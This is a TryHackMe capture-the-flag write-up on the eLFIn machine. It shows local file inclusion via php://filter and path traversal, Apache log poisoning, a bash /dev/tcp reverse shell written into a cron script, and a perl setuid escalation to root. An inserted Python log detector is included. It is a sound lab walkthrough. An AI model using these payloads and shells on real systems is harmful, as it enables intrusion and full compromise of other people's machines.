eLFIn-TryHackMe-Writeup

LFI machine

Faris
5 min read · Jul 9, 2021

This time I am solving a TryHackMe machine called eLFIn.

Let's start with scanning, as usual.

Nmap scan

Only two ports were open: SSH and the default web port.

From the machine's name it's obvious that the machine is vulnerable to LFI (Local File Inclusion). If you don't know what LFI is, a quick Google search will help you understand it.

Now let's find a parameter on the web page to abuse.

list parameter

As we can see, there is a parameter called list that takes us from one page to another.

I tried changing page1 to an LFI payload, and here is what I got :D

http://elfin.thm/index.php?list=/

Well, looks like he knew we would be here.

A rickroll would have been much better, but anyway, let's dig deeper since we are on the right track.

After trying many payloads that all failed, I tried this one and finally got something interesting:

php://filter/convert.base64-encode/resource=page2/../index

It looks like base64 encoding; let's decode it.

page source

And here we are with the full page source.

While checking the PHP code we can see that the server accepts a variable called "src" and adds the .php extension itself. By adding one of the accepted parameters and then the path to /etc/passwd, we should be able to read it. Let's try:

http://elfin.thm/index.php?list=page1/../../../../etc/passwd&src=

Nice, I was able to read /etc/passwd successfully.

/etc/passwd

For a better look:

Only three users can log in: root, www-data and bob.

After a lot of searching for access.log, it was very hard to find since it wasn't in its default directory.

So let's try searching for 000-default.conf instead. After a simple Google search I found that it's located at "/etc/apache2/sites-available/000-default.conf".

http://elfin.thm/index.php?list=page1/../../../../etc/apache2/sites-available/000-default.conf&src=

access.log location

We can see that the access.log location is configured in /etc/apache2/sites-available/site-2.conf.

After changing the URL to that location, I found this:

http://elfin.thm/index.php?list=page1/../../../../etc/apache2/sites-available/site-2.conf&src=

It's written here that the access.log file was moved for security purposes:

/var/log/eLFInlogs/access.log

Nice, that was the right directory. Now it's time to read it; just change the URL as I did before:

http://elfin.thm/index.php?list=page1/../../../..//var/log/eLFInlogs/access.log&src=

It has all the requests we made before, along with the User-Agent (browser version).

That means that if we change the User-Agent with Burp, we might be able to execute PHP code. Let's give it a try.

See how what we send in the request appears back in the server's response.

I tried log poisoning with many payloads and finally found the way in: encoding the payload once in Burp makes it work.

shell request

After sending this request, with netcat running as a listener on the other side, we got a shell as user www-data.

bash -c 'exec bash -i &>/dev/tcp/<ip>/<port> <&1'
nc -nvlp 1234
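The access.log we read through the LFI is also where a defender would spot this whole chain: traversal and php:// wrapper payloads in the list parameter, and a PHP open tag in the User-Agent from the log poisoning step. The detector below is an added example written for this write-up, not code from the room or its author; it parses Apache combined-format lines, URL-decodes query values and the User-Agent (so a payload that was "encoded once" still shows up), and flags each request with its reasons. The log lines are constructed to mirror the requests in this write-up.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format, the format of the access.log read through the LFI.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TRAVERSAL = re.compile(r'\.\.[/\\]')                               # ../ or ..\ sequences
WRAPPER = re.compile(r'\b(php|data|expect|phar|zip)://', re.I)     # PHP stream wrappers
PHP_TAG = re.compile(r'<\?(php|=)', re.I)                          # PHP open tag in a header

def analyse(line):
    """Return a finding dict for a suspicious log line, or None for a clean one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    query = urlsplit(m['target']).query
    # parse_qsl already decodes one layer; the extra unquote() catches a value that
    # was URL-encoded twice so that it survived the first decode on the server.
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)
        if TRAVERSAL.search(decoded):
            reasons.append(f'traversal in {name}')
        if WRAPPER.search(decoded):
            reasons.append(f'stream wrapper in {name}')
    # A PHP tag in the User-Agent only makes sense as an attempt to poison this log.
    if PHP_TAG.search(unquote(m['ua'])):
        reasons.append('php tag in user-agent')
    if not reasons:
        return None
    return {'ip': m['ip'], 'target': m['target'], 'reasons': reasons}

def scan(lines):
    """Run analyse() over an iterable of log lines and keep only the findings."""
    return [f for f in (analyse(l) for l in lines) if f]

# Constructed sample lines modelled on the requests in this write-up (not a real log).
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Jul/2021:10:00:01 +0000] "GET /index.php?list=page1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [09/Jul/2021:10:00:02 +0000] "GET /index.php?list=php://filter/convert.base64-encode/resource=page2/../index HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [09/Jul/2021:10:00:03 +0000] "GET /index.php?list=page1/../../../../etc/passwd&src= HTTP/1.1" 200 1337 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [09/Jul/2021:10:00:04 +0000] "GET /index.php?list=page1/../../../..//var/log/eLFInlogs/access.log&src= HTTP/1.1" 200 4096 "-" "%3C%3Fphp%20echo%201;%20%3F%3E"',
]

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f['ip'], f['target'], '->', ', '.join(f['reasons']))
```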

After some enumeration I found a hidden directory, /var/www/.secret, which has a file named priv.sh that runs all the time and which we can edit.... It could be useful if it runs as root. I checked the crontab, and it was scheduled to run priv.sh as user bob.

cat /etc/crontab

/etc/crontab

I added this reverse shell to the priv.sh file to get a shell as user bob and ran a listener in another terminal.

nc -nvlp <port>
echo "bash -c 'exec bash -i &>/dev/tcp/<IP>/<port> <&1'" >> /var/www/.secret/priv.sh

1st flag

Nice, we got the first flag. Our mission now is to get root privileges.

I looked for capabilities and found perl:

getcap -r / 2>/dev/null
perl = cap_setuid+ep

Now, by running this command, we can get root easily.

Note: we should be in /home/bob/.config before executing the command.

./.perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

Bingo... We are root now and can get root.txt easily.

root.txt

This machine was really fun, and I learnt new tricks about LFI.

SPECIAL THANKS:

n0n1mous (THM account)

Machine's owner: 1trick (THM account)
